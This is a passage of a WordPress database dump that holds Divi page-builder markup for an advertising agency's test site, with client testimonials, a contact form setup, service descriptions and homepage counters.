portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial graphic design\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial graphic design\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Amit\" title_text=\"Client Testimonial digital\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 20:02:06','2020-08-08 20:02:06','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(702,1,'2020-08-08 20:06:03','2020-08-08 20:06:03','Client Testimonial Advertising','Client Testimonial Advertising','','inherit','open','closed','','artboard-copy-4','','','2020-08-08 20:06:42','2020-08-08 20:06:42','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png',0,'attachment','image/png',0),(703,1,'2020-08-08 20:06:47','2020-08-08 20:06:47','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" 